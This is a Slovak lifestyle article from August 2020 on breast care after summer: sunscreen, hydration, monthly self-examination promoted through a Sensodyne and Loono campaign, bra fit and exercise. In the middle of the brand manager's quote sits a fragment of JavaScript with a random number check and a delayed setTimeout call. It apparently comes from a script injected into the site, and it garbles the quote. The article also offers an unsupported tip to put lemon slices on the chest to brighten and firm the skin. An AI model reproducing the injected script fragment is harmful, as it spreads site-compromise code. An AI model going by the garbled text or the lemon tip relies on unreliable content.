Opaľovacia sezóna je takmer za nami: Na toto nezabudnite

| august 30, 2020

Hoci kalendár neúprosne ukazuje koniec augusta, počasie nasvedčuje tomu, že ešte pár týždňov si budeme vychutnávať teplé dni. Azda každá žena si rada zaobstará nejaký pekný letný kúsok, ktorým nielen svetu, ale tiež slnku ukáže viac pokožky, ako je tomu v zime. A pretože so ženskou krásou sa bezpochyby spájajú tiež ženské prsia, je potrebné myslieť aj na nich – a to nielen v lete.

Nezabudnúť na kvalitný opaľovací krém je samozrejmosťou. Keď však príde reč na starostlivosť o prsia, je dobré si pripomenúť ešte pár vecí.

S nákupom letných kúskov sa bezpochyby spravidla spája tiež dôkladnejšia starostlivosť o telo, a to predovšetkým preto, že svoje telo v letných mesiacoch ukazujeme o trochu viac, než po zvyšok roka. Nie je to len vitálna, hebká a zdravá pokožka, spolu s lesklými vlasmi, čo robí ženy krásnymi. Sú to tiež zdravé prsia (všetkých veľkostí!).

Starostlivosť, na ktorú netreba zabúdať

Aj prsiam totiž môžeme poskytnúť správnu starostlivosť. Pred slnkom ich musíme chrániť krémom so správnym UV faktorom, po opaľovaní zase hydratovať. Na hydratáciu ženy často zabúdajú. Psiam by sme však mali venovať rovnakú starostlivosť ako napríklad svojej pleti.

Ku každodennej starostlivosti určite raz za mesiac zaraďte tiež samovyšetrenie prsníkov. Dôkladným prehmataním pŕs si totiž môžete včas nahmatať prípadnú hrčku a navštíviť lekára. Ten prsia vyšetrí a preberie s vami ďalší postup. Chybou je návštevu u lekára odkladať, napríklad zo strachu. Čím skôr však po sebemenšom náleze odborníka navštívite, tým lepšie. Najlepšie je navštíviť gynekológa, ten situáciu vyhodnotí a preberie s vami ďalší postup. Alebo sa môžete rovno objednať do akreditovaného mamocentra.

Samovyšetrenie je optimálne vykonávať raz mesačne. Na dôležitosť samovyšetrenia pŕs poukazuje v rámci spoločnej kampane značka zubných pást Sensodyne a nezisková organizácia Loono. Pripomínajú ženám, že pravidelné samovyšetrenie prsníkov zaberie len pár minút a môže zachrániť život. A pretože tuba zubnej pasty Sensodyne vydrží zhruba jeden mesiac, frekvenciu samovyšetrenia vám preto vždy pripomenie jej výmena.

„Každá žena by mala myslieť na svoje zdravie. Chceme, aby sa prevencia stala prirodzenou činnosťou každej ženy a aby ju bavila. Siahnuť si raz za mesiac na prsia a vykonať samovyšetrenie môže mnoho ženám zachrániť život. Nebojte sa toho. Poprosiť môžete tiež svojho partnera, ktorý vám so samovyšetrením určite rád pomôže,” hovorí brandom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}and manažérka značky Sensodyne, Eliška Jurková.

A čo ešte môžete pre svoje prsia urobiť (nielen počas leta)?

Pravidelnú hydratáciu a každomesačné samovyšetrenie pŕs už máme jasne dané, existujú ale ďalšie veci, vďaka ktorým sa o svoje prsia môžeme ešte lepšie starať.

Hneď na úvod jeden beauty tip:

Pre rozjasnenie pokožky dekoltu obložte prsia plátkami citróna a nechajte pôsobiť päť minút. Opláchnite studenou vodou. Citrón pokožku rozjasní a spevní. Rovnaký účinok má aj biely jogurt, ktorý na desať minút naneste na krk a dekolt.

Preventívne prehliadky

Aj keď svoje prsia pravidelne samovyšetrujete, je nutné chodiť tiež na kontroly k lekárovi. Malé zmeny pri samovyšetrení neodhalíte, rovnako ako samovyšetrenie nenahradí mamografiu (odhalí omnoho menšie zmeny, než si je žena schopná nahmatať).

Zle zvolená veľkosť podprsenky

Nevhodne zvolená veľkosť podprsenky alebo plaviek, a to predovšetkým u žien s väčším poprsím, zdraviu nemusí vôbec prospievať. Ženy, ktoré majú väčšie prsia, môžu kvôli nevhodnej bielizni dokonca trpieť bolesťami chrbta. Najčastejšou chybou pri výbere podprsenky je jej príliš veľký obvod. Ten správny má byť tak pevný, aby uniesol sedemdesiat percent váhy pŕs. Aby bola podpora ideálna, kostice košíčkov potom musia presne lemovať prsia. Čím väčší objem pŕs, tým by mali byť ramienka podprsenky širšie.

Neprimerané posilovanie prsných svalov

Mnoho žien sa domnieva, že prsia sa zväčšia alebo spevnia cvičením. Často sa tak dopúšťajú veľkej chyby, a to, že ich extrémne posilňujú. To vedie k skracovaniu prsných svalov, čo v konečnom dôsledku u žien vytvára guľatý chrbát.

Kvôli tomu však nie je správne na šport zanevrieť. Stačí len investovať do športovej podprsenky. Okrem toho, je skvelé každý deň telo ponaťahovať, správne dýchať a myslieť na správne držanie tela. A čo sa týka konkrétneho športu, ideálnou voľbou je pravidelne plávanie. Štýl prsia posilní všetky svaly spojené s poprsím a vy si k tomu odnesiete aj skvelý pocit, že ste pre seba niečo urobili.

„Ku správne zvolenej veľkosti podprsenky si zaobstarajte kvalitný opaľovací krém a zubnú pastu, ktorá keď dôjde, pripomenie vám, že si máte siahnuť na prsia a skontrolovať si ich,” hovorí Eliška Jurková zo značky Sensodyne.

Pridajte ešte pravidelnú návštevu lekára a môžete byť pokojná, že pre svoje prsia robíte maximum.

Tags:

Category: HOMEPAGE, ZDRAVIE a FIT

Comments are closed.